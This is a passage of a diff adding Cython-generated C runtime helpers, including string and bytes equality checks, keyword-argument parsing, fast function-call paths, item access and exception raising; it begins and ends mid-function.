-1 && hash2 != -1) { + return (equals == Py_NE); + } +#endif + result = memcmp(ps1, ps2, (size_t)length); + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & PyBytes_CheckExact(s2)) { + return (equals == Py_NE); + } else if ((s2 == Py_None) & PyBytes_CheckExact(s1)) { + return (equals == Py_NE); + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +#endif +} + +/* UnicodeEquals */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else +#if PY_MAJOR_VERSION < 3 + PyObject* owned_ref = NULL; +#endif + int s1_is_unicode, s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* PyObjectSetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE int __Pyx_PyObject_SetAttrStr(PyObject* obj, PyObject* attr_name, PyObject* value) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_setattro)) + return tp->tp_setattro(obj, attr_name, value); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_setattr)) + return tp->tp_setattr(obj, PyString_AS_STRING(attr_name), value); +#endif + return PyObject_SetAttr(obj, attr_name, value); +} +#endif + +/* GetItemInt */ +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { + PyObject *r; + if (unlikely(!j)) return NULL; + r = PyObject_GetItem(o, j); + Py_DECREF(j); + return r; +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyList_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { + PyObject *r = PyList_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + Py_ssize_t wrapped_i = i; + if (wraparound & unlikely(i < 0)) { + wrapped_i += PyTuple_GET_SIZE(o); + } + if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); + Py_INCREF(r); + return r; + } + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +#else + return PySequence_GetItem(o, i); +#endif +} +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, + CYTHON_NCP_UNUSED int wraparound, + CYTHON_NCP_UNUSED int boundscheck) { +#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS + if (is_list || PyList_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); + if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { + PyObject *r = PyList_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } + else if (PyTuple_CheckExact(o)) { + Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); + if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { + PyObject *r = PyTuple_GET_ITEM(o, n); + Py_INCREF(r); + return r; + } + } else { + PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; + PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; + if (mm && mm->mp_subscript) { + PyObject *r, *key = PyInt_FromSsize_t(i); + if (unlikely(!key)) return NULL; + r = mm->mp_subscript(o, key); + Py_DECREF(key); + return r; + } + if (likely(sm && sm->sq_item)) { + if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { + Py_ssize_t l = sm->sq_length(o); + if (likely(l >= 0)) { + i += l; + } else { + if (!PyErr_ExceptionMatches(PyExc_OverflowError)) + return NULL; + PyErr_Clear(); + } + } + return sm->sq_item(o, i); + } + } +#else + if (is_list || PySequence_Check(o)) { + return PySequence_GetItem(o, i); + } +#endif + return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); +} + +/* PyObjectCallOneArg */ +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject *arg) { + PyObject *args[2] = {NULL, arg}; + return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); +} + +/* ObjectGetItem */ +#if CYTHON_USE_TYPE_SLOTS +static PyObject *__Pyx_PyObject_GetIndex(PyObject *obj, PyObject *index) { + PyObject *runerr = NULL; + Py_ssize_t key_value; + key_value = __Pyx_PyIndex_AsSsize_t(index); + if (likely(key_value != -1 || !(runerr = PyErr_Occurred()))) { + return __Pyx_GetItemInt_Fast(obj, key_value, 0, 1, 1); + } + if (PyErr_GivenExceptionMatches(runerr, PyExc_OverflowError)) { + __Pyx_TypeName index_type_name = __Pyx_PyType_GetName(Py_TYPE(index)); + PyErr_Clear(); + PyErr_Format(PyExc_IndexError, + "cannot fit '" __Pyx_FMT_TYPENAME "' into an index-sized integer", index_type_name); + __Pyx_DECREF_TypeName(index_type_name); + } + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem_Slow(PyObject *obj, PyObject *key) { + __Pyx_TypeName obj_type_name; + if (likely(PyType_Check(obj))) { + PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(obj, __pyx_n_s_class_getitem); + if (meth) { + PyObject *result = __Pyx_PyObject_CallOneArg(meth, key); + Py_DECREF(meth); + return result; + } + } + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "'" __Pyx_FMT_TYPENAME "' object is not subscriptable", obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return NULL; +} +static PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key) { + PyTypeObject *tp = Py_TYPE(obj); + PyMappingMethods *mm = tp->tp_as_mapping; + PySequenceMethods *sm = tp->tp_as_sequence; + if (likely(mm && mm->mp_subscript)) { + return mm->mp_subscript(obj, key); + } + if (likely(sm && sm->sq_item)) { + return __Pyx_PyObject_GetIndex(obj, key); + } + return __Pyx_PyObject_GetItem_Slow(obj, key); +} +#endif + +/* KeywordStringCheck */ +static int __Pyx_CheckKeywordStrings( + PyObject *kw, + const char* function_name, + int kw_allowed) +{ + PyObject* key = 0; + Py_ssize_t pos = 0; +#if CYTHON_COMPILING_IN_PYPY + if (!kw_allowed && PyDict_Next(kw, &pos, &key, 0)) + goto invalid_keyword; + return 1; +#else + if (CYTHON_METH_FASTCALL && likely(PyTuple_Check(kw))) { + if (unlikely(PyTuple_GET_SIZE(kw) == 0)) + return 1; + if (!kw_allowed) { + key = PyTuple_GET_ITEM(kw, 0); + goto invalid_keyword; + } +#if PY_VERSION_HEX < 0x03090000 + for (pos = 0; pos < PyTuple_GET_SIZE(kw); pos++) { + key = PyTuple_GET_ITEM(kw, pos); + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } +#endif + return 1; + } + while (PyDict_Next(kw, &pos, &key, 0)) { + #if PY_MAJOR_VERSION < 3 + if (unlikely(!PyString_Check(key))) + #endif + if (unlikely(!PyUnicode_Check(key))) + goto invalid_keyword_type; + } + if (!kw_allowed && unlikely(key)) + goto invalid_keyword; + return 1; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + return 0; +#endif +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif + return 0; +} + +/* GetAttr3 */ +static PyObject *__Pyx_GetAttr3Default(PyObject *d) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (unlikely(!__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + return NULL; + __Pyx_PyErr_Clear(); + Py_INCREF(d); + return d; +} +static CYTHON_INLINE PyObject *__Pyx_GetAttr3(PyObject *o, PyObject *n, PyObject *d) { + PyObject *r; +#if CYTHON_USE_TYPE_SLOTS + if (likely(PyString_Check(n))) { + r = __Pyx_PyObject_GetAttrStrNoError(o, n); + if (unlikely(!r) && likely(!PyErr_Occurred())) { + r = __Pyx_NewRef(d); + } + return r; + } +#endif + r = PyObject_GetAttr(o, n); + return (likely(r)) ? r : __Pyx_GetAttr3Default(d); +} + +/* PyDictVersioning */ +#if CYTHON_USE_DICT_VERSIONS && CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PY_UINT64_T __Pyx_get_tp_dict_version(PyObject *obj) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + return likely(dict) ? __PYX_GET_DICT_VERSION(dict) : 0; +} +static CYTHON_INLINE PY_UINT64_T __Pyx_get_object_dict_version(PyObject *obj) { + PyObject **dictptr = NULL; + Py_ssize_t offset = Py_TYPE(obj)->tp_dictoffset; + if (offset) { +#if CYTHON_COMPILING_IN_CPYTHON + dictptr = (likely(offset > 0)) ? (PyObject **) ((char *)obj + offset) : _PyObject_GetDictPtr(obj); +#else + dictptr = _PyObject_GetDictPtr(obj); +#endif + } + return (dictptr && *dictptr) ? __PYX_GET_DICT_VERSION(*dictptr) : 0; +} +static CYTHON_INLINE int __Pyx_object_dict_version_matches(PyObject* obj, PY_UINT64_T tp_dict_version, PY_UINT64_T obj_dict_version) { + PyObject *dict = Py_TYPE(obj)->tp_dict; + if (unlikely(!dict) || unlikely(tp_dict_version != __PYX_GET_DICT_VERSION(dict))) + return 0; + return obj_dict_version == __Pyx_get_object_dict_version(obj); +} +#endif + +/* GetModuleGlobalName */ +#if CYTHON_USE_DICT_VERSIONS +static PyObject *__Pyx__GetModuleGlobalName(PyObject *name, PY_UINT64_T *dict_version, PyObject **dict_cached_value) +#else +static CYTHON_INLINE PyObject *__Pyx__GetModuleGlobalName(PyObject *name) +#endif +{ + PyObject *result; +#if !CYTHON_AVOID_BORROWED_REFS +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030500A1 + result = _PyDict_GetItem_KnownHash(__pyx_d, name, ((PyASCIIObject *) name)->hash); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } else if (unlikely(PyErr_Occurred())) { + return NULL; + } +#elif CYTHON_COMPILING_IN_LIMITED_API + if (unlikely(!__pyx_m)) { + return NULL; + } + result = PyObject_GetAttr(__pyx_m, name); + if (likely(result)) { + return result; + } +#else + result = PyDict_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } +#endif +#else + result = PyObject_GetItem(__pyx_d, name); + __PYX_UPDATE_DICT_CACHE(__pyx_d, result, *dict_cached_value, *dict_version) + if (likely(result)) { + return __Pyx_NewRef(result); + } + PyErr_Clear(); +#endif + return __Pyx_GetBuiltinName(name); +} + +/* RaiseUnexpectedTypeError */ +static int +__Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj) +{ + __Pyx_TypeName obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, "Expected %s, got " __Pyx_FMT_TYPENAME, + expected, obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto 